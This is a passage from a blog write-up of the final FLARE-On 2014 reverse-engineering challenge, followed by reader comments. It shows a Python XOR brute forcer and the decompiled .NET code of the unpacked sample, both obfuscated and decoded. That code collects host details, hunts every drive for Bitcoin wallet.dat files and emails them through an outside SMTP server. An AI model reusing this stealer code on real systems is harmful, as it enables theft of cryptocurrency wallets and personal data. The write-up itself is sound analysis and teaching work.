The obvious checks were eliminated: the "MZ" and "PE" bytes used other characters in the encoded file; you have to supply those on the command line. So, that took out the ability to search for 0x4d5a00 easily. I went straight to work documenting all of the keys and routines and writing a brute forcer. I would force every possible key against the executable until it developed a clean file. I'll admit that many of the checks were interesting, and followed core connectivity/verification checks that malware likes to use:
There were slight differences in how many of the functions performed their XOR'ing. Some were just to accommodate two keys in the same string. At the end they could've all been the same, but I tried to replicate them as I saw them, and wrote the following brute forcer:
# @bbaskin import itertools def x(data, key, keylen): newdata = '' for i in range(0, len(data)): newdata += chr( ord(data[i]) ^ ord(key[ i % keylen ])) return newdata def x2(data, key, keylen): newdata = '' for i in range(0, len(data)): newdata += chr( ord(data[i]) ^ ord(key[ i & keylen ])) return newdata def x3(data, key, num1, num2): newdata = '' for i in range(0, len(data)): newdata += chr( ord(data[i]) ^ ord(key[ (i & num1) + num2 ])) return newdata def x4(data, key, num1, num2): newdata = '' for i in range(0, len(data)): newdata += chr( ord(data[i]) ^ ord(key[ (i % num1) + num2 ])) return newdata def CheckPEB(): global data if run[0]: data = x(data, "UNACCEPTABLE!", 13) else: data = x(data, "omglob", 6) def CheckSIDT(): global data if run[1]: data = x(data, "you're so bad", 13) else: data = x(data, "you're so good", 14) def CheckVMXh(): global data if run[2]: data = x(data, "\x01", 1) else: data = x(data, "f", 1) def CheckLastError(): global data if run[3]: data = x(data, "I'm gonna sandbox your face", 27) else: data = x(data, "Sandboxes are fun to play in", 28) def CheckDebugger(): global data if run[4]: data = x(data, "Such fire. Much burn. Wow.", 26) else: data = x(data, "I can haz decode?", 17) def Check64Bit(): global data if run[5]: data = x(data, "Feel the sting of the Monarch!", 30) else: data = x(data, "\x09\x00\x00\x01", 4) def CheckFriday(): global data if run[6]: data = x(data, "! 50 1337", 9) else: data = x2(data, "1337", 3) def CheckFNBackDoge(): global data if run[7]: data = x(data, "MATH IS HARDLETS GO SHOPPING", 12) else: data = x3(data, "MATH IS HARDLETS GO SHOPPING", 15, 12) def CheckInternetAccess(): global data if run[8]: data = x2(data, "SHOPPING IS HARDLETS GO MATH", 15) else: data = x4(data, "SHOPPING IS HARDLETS GO MATH", 12, 16) def Check5PM(): global data if run[9]: data = x2(data, "\x07w", 1) else: data = x(data, "\x01\x02\x03\x05\x00\x78\x30\x38\x0D", 9) def CheckDNSROOT(): global data if run[10]: IP = "192.203.230.10" newdata = '' for i in range(0, len(data)): pos = i % len(IP) newdata += chr( ord(data[i]) ^ ord(IP[pos]) ) data = newdata def CheckTwitter(): global data if run[11]: data = x(data, "jackRAT", 7) def CheckDebugger2(): global data if run[12]: data = x(data, "the final countdown", 19) else: data = x(data, "oh happy dayz", 13) def XorPath(): global data path = "backdoge.exe" data = x(data, path, 12) def main(): global data global run CheckPEB() CheckSIDT() CheckVMXh() CheckLastError() CheckDebugger() Check64Bit() CheckFriday() CheckFNBackDoge() CheckInternetAccess() Check5PM() CheckDNSROOT() CheckTwitter() CheckDebugger2() XorPath() if __name__ == "__main__": global data global run fh = open('backdoge.exe', 'rb') fh.seek(0x113f8) data_back = fh.read(118272) fh.close() for run in itertools.product(range(2), repeat=13): fn = "E:\\Malware\\FLARE\\7\\out\\" for z in itertools.product(*[run]): fn += str(z[0]) data = data_back main() if data[2] == "\x90" and data[3] == "\x00" and data[5] == "\x00" and data[6] == "\x00": print run, data[0:12].encode('hex') open(fn, 'wb').write(data)
It's not great code, and not fast, but it worked. Eventually. I wasted an entire day of effort on this because I mis-numbered the offsets and so was not getting any positive results. This caused me to go extremely in depth with the script, only to learn my mistake the next day. <face palm>
After a few minutes of (successful) running, an executable alerted:
E:\malware\FLARE\7>7_bruteforce.py
(0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1) feeb9000030000000400050e
After applying the "MZ" and "PE", it became a legitimate executable!
File Name : gratz.exe
File Size : 118,272 bytes
MD5 : 4f2b4cc03199553ff39d7e214a4ee8c6
SHA1 : 2a6fc52764451e8d937f2dc0464aa0ba809031f4
Fuzzy : 3072:Bt9rJyNXrCJsq18PG/i9SICdn8rMA+GJJLOFiUF1hSBSi/NgXf5wq:b9rJgbI8P597rMryL2nFiBSAePq
Import Hash : f34d5f2d4577ed6d9ceec516c1f5a744
Compiled Time : Sat Jul 05 22:58:43 2014 UTC
PE Sections (3) : Name Size MD5
.text 115,712 9c7b5b112287933a9dd532548895a3ac
.rsrc 1,536 b34dc44cc95a966d8d2df8a209f2ecf1
.reloc 512 aaa13a058c9ceffaaf68b401a847b37c
Magic : PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
.NET Version : 2.0.0.0
First, I execute it to see what happens:
I had seen this guy being spread around Twitter by others finishing up, so I knew I was close. Seeing the .NET 2.0 here, I load the sample up in .NET Reflector for analysis.
The main Form1 function contains no overtly weird data for this form. There's no hidden buttons but not all labels are accounted for in the output. There are 7 labels (1-8, 7 is missing) and all are displayed except 2. Label2.text is missing from the form.
Let's start from the beginning and monitor the form creation. The form starts a new thread to call a routine call lulzors:
This routine sets Label2.text, the missing equation, by sending obfuscated data to lulz.decoder4. I use Reflector to browse to the lulz module and see a few bits of obfuscation:
public class lulz { public void datwork() { object obj2 = ((("" + this.decoder1("(\x0014\x0018Z.\x0010\r\x0019\x0003\x001bVpAXAWAXAWAXAWAXAWAXAWAXAWAXAWAXAWAXAp")) + this.decoder2("9\t\n\x001b\x001d\x0006\fIT") + Environment.MachineName + "\n") + this.decoder3("&\x001a\t\x001e=\x001c\x0004\r\x0005\x0017II") + Environment.UserDomainName + "\n") + this.decoder1("9\x0006\t\bVU") + Environment.UserName + "\n"; string info = string.Concat(new object[] { obj2, this.decoder2(";;I%\x0011\x001a\x001a\x001a\x001b\x0006SS"), Environment.OSVersion, "\n" }); foreach (string str2 in Environment.GetLogicalDrives()) { info = info + this.decoder3("7\x001b\x0005\x001a\x001cII") + str2 + "\n"; this.yum(str2, this.decoder1("\x001b\x0014\0\x0016\t\x0001B\x001e\r\x0001"), ref info); } string str3 = ""; foreach (IPAddress address in Dns.GetHostEntry(Dns.GetHostName()).AddressList) { if (address.AddressFamily == AddressFamily.InterNetwork) { str3 = address.ToString(); break; } } info = info + this.decoder3(":9VL") + str3 + "\n\n"; MailMessage message = new MailMessage(); message.To.Add(this.decoder2("\x0015\x0004X]\x0010\t\x001d]\x0010\t\x001d\x00124\x000e\x0005\x0012\x0006\rD\x001c\x001aF\n\x001c\x0019")); message.Subject = this.decoder3(":N\x0001L\x0018S\n\x0003\x0001\t\x0006\x001d\t\x001e"); message.From = new MailAddress(this.decoder1("\0\0\0\0,\x0013\0\x001b\x001e\x0010A\x0015\x0002[\x000f\x0015\x0001")); message.Body = info; new SmtpClient(this.decoder2("\a\x0005\x001d\x0003Z\x001b\f\x0010\x0001\x001a\f\0\x0011\x001a\x001f\x0016\x0006F\a\x0016\0")).Send(message); } public string decoder1(string encoded) { string str = ""; string str2 = "lulz"; for (int i = 0; i < encoded.Length; i++) { str = str + ((char) (encoded[i] ^ str2[i % str2.Length])); } return str; } public string decoder2(string encoded) { string str = ""; string str2 = "this"; for (int i = 0; i < encoded.Length; i++) { str = str + ((char) (encoded[i] ^ str2[i % str2.Length])); } return str; } public string decoder3(string encoded) { string str = ""; string str2 = "silly"; for (int i = 0; i < encoded.Length; i++) { str = str + ((char) (encoded[i] ^ str2[i % str2.Length])); } return str; } public string decoder4(string encoded) { string str = ""; string str2 = this.decoder2("\x001b\x0005\x000eS\x001d\x001bI\a\x001c\x0001\x001aS\0\0\fS\x0006\r\b\x001fT\a\a\x0016K"); for (int i = 0; i < encoded.Length; i++) { str = str + ((char) (encoded[i] ^ str2[i % str2.Length])); } return str; } public void yum(string folder, string name, ref string info) { try { foreach (string str in Directory.GetFiles(folder)) { if (str.EndsWith(name)) { byte[] inArray = File.ReadAllBytes(str); info = info + this.decoder3("=\x0006\x0001\x001fCS") + str + "\n"; info = info + Convert.ToBase64String(inArray) + "\n"; } } foreach (string str2 in Directory.GetDirectories(folder)) { this.yum(str2, name, ref info); } } catch (Exception exception) { Console.WriteLine(exception.Message); } } }
The first thing I noticed was the creation of an email in datwork(), where obfuscated fields are used to create the recipient, subject, and body. We'll come back to that.
There are multiple "decoder" functions, each simply doing multi-byte XOR against static strings: lulz, this, silly, and an obfuscated value that resolves to. "omg is this the real one?". I recreated each in Python, decoded the values, and replaced them back into the source:
public class lulz { public void datwork() { object obj2 = (("Dat Beacon:\n-----------------------------------\n" + "Machine: " + Environment.MachineName + "\n") + "UserDomain:" + Environment.UserDomainName + "\n") + "User: " + Environment.UserName + "\n"; string info = string.Concat(new object[] { obj2, "OS Version: ", Environment.OSVersion, "\n" }); foreach (string str2 in Environment.GetLogicalDrives()) { info = info + "Drive: " + str2 + "\n"; this.yum(str2, "wallet.dat", ref info); } string str3 = ""; foreach (IPAddress address in Dns.GetHostEntry(Dns.GetHostName()).AddressList) { if (address.AddressFamily == AddressFamily.InterNetwork) { str3 = address.ToString(); break; } } info = info + "IP: " + str3 + "\n\n"; MailMessage message = new MailMessage(); message.To.Add("al1.dat.data@flare-on.com"); message.Subject = "I'm a computer"; message.From = new MailAddress("lulz@flare-on.com"); message.Body = info; new SmtpClient("smtp.secureserver.net").Send(message); } public void yum(string folder, string name, ref string info) { try { foreach (string str in Directory.GetFiles(folder)) { if (str.EndsWith(name)) { byte[] inArray = File.ReadAllBytes(str); info = info + "Noms: " + str + "\n"; info = info + Convert.ToBase64String(inArray) + "\n"; } } foreach (string str2 in Directory.GetDirectories(folder)) { this.yum(str2, name, ref info); } } catch (Exception exception) { Console.WriteLine(exception.Message); } } }
Let me just say ... WTF?! This routine will build basic data about your system to email out but, more specifically, search all of your local hard drives for a bitcoin wallet. If found, the contents will be copied and emailed to FireEye. Maybe it's just to highlight the importance of running within a VM, or without Internet access, but ...
Anyhow, this is all secondary to the purpose of the file, to get the email. And that "al1.dat.data@flare-on.com" is not the correct one. Instead, we need to go back to the form and find the data being send into decoder4(). Resolving it gives:
That sounds like it! Beaten, and exhausted, I shoot the final email off at 1750 on 31 July, with just over an hour before my personal deadline. Two and a half days were spent on this last challenge. I receive my confirmation two minutes later and go open a bottle of whisky.
After a few days I received a follow-up email asking how I completed the last few challenges, which I replied to, and then received my award on 20 September, an RMO designating my finish order (0x83 or 131):
Thanks to FireEye and the FLARE team for a fun challenge! I had a lot of fun and constructive frustration in solving them. We all knew this was a recruitment drive, but it was still fun :)
Thanks you for reading, and I hope this helps anyone else in the field!
Great work! You've the skills! Thank you for sharing :)
ReplyDeleteImpressive. will like to be like you when i grow up.
ReplyDeleteGreat writeup and article!
ReplyDelete